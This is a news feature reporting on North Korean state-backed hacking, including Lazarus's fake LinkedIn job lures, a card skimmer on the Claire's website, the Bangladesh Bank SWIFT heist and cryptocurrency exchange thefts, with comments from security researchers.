North Korea keeps coffers stacked from hacks
Everything from fashion sales to the Fed have become targets for North Korean cyber thieves, discovers James Cook
At the end of 2019, a series of apparently innocuous messages were sent through LinkedIn to employees of aerospace and military companies in the UK, Europe and the Middle East. “We welcome elites like you,” said one message which seemed to have been sent by a recruiter working for a rival business. “I want you to work in our company.”
Curious engineers who replied to the job offers were sent further messages urging them to download files to find out more. “As you are a reliable elite, I will recommend you to our very important department,” they were promised before being encouraged to open files containing a list of open jobs and salaries.
But while recipients read through the list of highly paid positions, their computers were being silently hijacked by hackers who implanted software to allow them to peer through all their files and emails.
The jobs and the recruiters weren’t real, but part of an elaborate scam.
The messages were sent by Lazarus, a notorious North Korean hacking group which managed to break into the servers of Sony Pictures in 2014, and brought parts of the NHS to a standstill during the WannaCry ransomware attack in 2017, say experts from cybersecurity businesses ESET and F-Secure.
Once the hackers had gained access to a target’s computer, the fake LinkedIn profiles vanished. One hacker then used his access to a victim’s email account to find an outstanding invoice. He sent an email to another business demanding payment, but asked for the money to be sent to a new bank account controlled by the hacking group.
This cyberattack is a typical example of North Korea’s unique approach to hacking. As well as hacking to make political statements, the country uses its legions of hackers to generate billions of dollars for the regime through a series of audacious cyber bank heists.
A United Nations report published last year estimated that North Korean hackers have stolen more than $2bn (£1.5bn) and said the money was being funnelled into the regime’s missile development programmes.
Cut off from almost all of the world’s financial system, North Korea has for years relied on illegal activities to bolster its income. As well as thriving drug trafficking and counterfeiting schemes, the regime has also funded hundreds of digital bank heists. Spy agencies around the world typically consider Chinese and Russian hackers to be their largest problem, with North Korea and Iran seen as more amateur. Ed Parsons, the managing director of F-Secure Consulting who has been tracking recent North Korean attacks against the UK, says the country’s hackers are “opportunistic”.
“They’re quite brazen, they’re more indiscriminate and prolific compared to other threat actors,” he says.
The constant stream of cyber attacks from North Korea hasn’t slowed during the coronavirus pandemic.
Claire’s, the fashion accessories chain, announced on March 20 that it would close all of its shops during lockdown. Within hours, a North Korean hacker had purchased the web domain claires-assets.com.
Four weeks later, cybersecurity business Sansec spotted that hackers had managed to sneak a snippet of malicious code on to the main Claire’s website which silently intercepted the card details of people shopping online from their homes for weeks until it was removed on June 13.
The stolen card numbers were smuggled out to claires-assets.com, an innocent-looking web domain which was unlikely to raise alarm bells at Claire’s.
“North Korea seems to be acting like a cyber crime group,” says Kayla Izenman, a researcher at the Royal United Services Institute. “They are extremely successful.”
These recent hacks, however, are small fry in scale compared to North Korea’s most audacious cyber heist.
In 2016, its hackers used the SWIFT credentials of employees of Bangladesh’s central bank to send a series of transfer requests to the Federal Reserve Bank of New York.
They made away with $81m from the central bank’s accounts, but missed out on their attempted haul of $1bn when Deutsche Bank and the Fed raised alarm.
Deutsche only looked into the transactions when it spotted a misspelled world in one of the payment requests. A fictional Sri Lankan non-profit organisation was called a “fandation” rather than “foundation”. The blunder stopped the hackers from stealing $851m more.
In recent years, the North Korean regime’s attention has turned to the softer target of cryptocurrency. North Korean hackers have broken into countless cryptocurrency exchanges and stolen hundreds of millions of dollars of virtual currencies.
“Any numbers that you see in terms of scope or scale of how much cryptocurrency that they’re holding, you probably need to double it,” Izenman says.
In late 2018, North Korean hackers posed as potential clients of a cryptocurrency exchange, and began emailing its employees. When the exchange asked them to send photographs of themselves holding identifying documents, they simply forged the images using Photoshop to mask their true identities.
Some of their emails were laced with malware that gave the hackers access to the company’s servers. Once inside the network, the hackers stole $234m worth of digital currencies such as Bitcoin and Dogecoin, according to a US government indictment.
Cryptocurrencies may be able to move around outside of the world’s traditional banking networks, but law enforcement agencies around the world have found ways to track its movement.
That causes a problem for North Korean hackers seeking ways to hide their transfer of funds, so they often use elaborate schemes to hide the movement of the digital money, such as transferring virtual coins more than 5,000 times in an attempt to throw investigators off their scent.
Security experts warn that a long-standing impression that North Korean hackers typically carry out the digital equivalent of smash and grab raids, breaking into networks and stealing as much money as possible before fleeing, is no longer correct.
Instead, they are becoming more sophisticated, and taking care to hamper any efforts to track their movements inside companies.
“We have had clear evidence of really concerted efforts by North Korean attackers to hide their tracks,” Parsons says.
Instead of grabbing the digital cash and fleeing, they’re now securely deleting any evidence that they were ever inside networks before making away with the proceeds.
That’s a concern for security experts who spend their lives trying to safeguard networks against the hackers. There is no sign of North Korean hackers slowing down their virtual bank heists during the pandemic, and it seems they’re only getting smarter.
‘North Korea seems to be acting like a cyber crime group. They are extremely successful’
Spy gains: hacking is hugely lucrative for the regime